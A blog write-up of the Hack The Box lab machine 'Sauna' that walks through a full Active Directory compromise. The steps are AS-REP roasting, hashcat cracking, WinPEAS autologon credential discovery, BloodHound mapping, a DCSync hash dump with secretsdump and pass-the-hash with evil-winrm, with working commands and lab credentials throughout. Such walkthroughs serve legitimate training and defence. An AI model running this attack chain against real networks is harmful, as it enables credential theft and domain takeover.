Myles Nieman
← All writeups

Sauna

Overview

Sauna is an easy Windows Active Directory box. The target runs a bank website that lists employee names. Converting those names into likely AD username formats reveals one account — fsmith — with Kerberos pre-authentication disabled, making it AS-REP roastable. Cracking the roasted hash gives a working WinRM login. Once inside, WinPEAS finds autologon credentials for a second account (svc_loanmgr) that BloodHound shows has DCSync rights over the domain. Dumping the Administrator NTLM hash via DCSync allows a pass-the-hash WinRM session as domain admin.

Path: employee name enumeration → AS-REP roasting (fsmith) → WinPEAS autologon creds → svc_loanmgr DCSync → Administrator hash → root.

Enumeration

A full port scan reveals the standard Windows domain controller fingerprint: DNS, Kerberos, LDAP, SMB, WinRM, and IIS on port 80 — with the domain EGOTISTICAL-BANK.LOCAL.

$ nmap -p- -A 10.129.95.180
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: Egotistical Bank :: Home
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn
389/tcp   open  ldap          Microsoft Windows AD LDAP (Domain: EGOTISTICAL-BANK.LOCAL)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows AD LDAP (Domain: EGOTISTICAL-BANK.LOCAL)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (WinRM)
9389/tcp  open  mc-nmf        .NET Message Framing
Service Info: Host: SAUNA; OS: Windows

Nmap output for Sauna confirming EGOTISTICAL-BANK.LOCAL domain controller

Adding EGOTISTICAL-BANK.LOCAL to /etc/hosts, the website shows a public team page listing six employees:

The Egotistical Bank team page listing staff names

Fergus Smith    Hugo Bear      Steven Kerb
Shaun Coins     Bowie Taylor   Sophie Driver

Foothold — AS-REP Roasting

I generated a username wordlist from the six names in common AD formats (first.last, flast, firstl) and ran GetNPUsers.py against the domain to check for accounts with pre-authentication disabled:

$ GetNPUsers.py -usersfile usersMaybe EGOTISTICAL-BANK.LOCAL/ -format hashcat -outputfile hashes.txt

GetNPUsers returning an AS-REP hash for fsmith

fsmith has pre-auth disabled. Cracking the resulting hash against rockyou.txt:

$ hashcat -m 18200 -a 0 hashes.txt /tools/SecLists/Passwords/Leaked-Databases/rockyou.txt

Hashcat cracking the AS-REP hash to recover fsmith’s password

Credentials: fsmith : Thestrokes23

User

With WinRM open, logging in is straightforward:

$ evil-winrm -u fsmith -p 'Thestrokes23' -i EGOTISTICAL-BANK.LOCAL

whoami /all shows fsmith has no interesting privileges beyond the default Remote Management Users membership — no direct path to escalation from here.

Privilege Escalation — Autologon Credentials and DCSync

Running WinPEAS surfaces AutoLogon registry credentials:

WinPEAS revealing autologon credentials for svc_loanmanager

svc_loanmanager : Moneymakestheworldgoround!

Note: the actual AD account name is svc_loanmgr (truncated). A BloodHound collection using fsmith’s credentials maps the domain graph:

$ python3 /tools/bloodhoundCE-py/bloodhound.py \
    -u fsmith -p "Thestrokes23" \
    -d EGOTISTICAL-BANK.LOCAL -c All --zip \
    -ns 10.129.95.180

BloodHound collection completing successfully

BloodHound shows svc_loanmgr has DCSync rights (DS-Replication-Get-Changes-All):

BloodHound graph showing svc_loanmgr’s DCSync rights over the domain

DCSync lets us impersonate a domain controller and pull NTLM hashes for any account directly from NTDS.DIT:

$ secretsdump.py svc_loanmgr:'Moneymakestheworldgoround!'@10.129.95.180 \
    -just-dc-user Administrator
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::

Root

With the Administrator NTLM hash in hand, a pass-the-hash WinRM session gives domain admin access:

$ evil-winrm -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e -i EGOTISTICAL-BANK.LOCAL

Evil-WinRM shell as Administrator via pass-the-hash

Takeaways

  • AS-REP roasting requires only a username list — no prior credentials needed. Accounts with pre-auth disabled are offline crackable and should not exist in production; the fix is enforcing Kerberos pre-authentication for all accounts.
  • AutoLogon credentials in the registry are a common lateral-movement path. WinPEAS reliably surfaces them; once an account with DCSync rights is compromised, the entire domain is effectively owned without touching a Domain Controller interactively.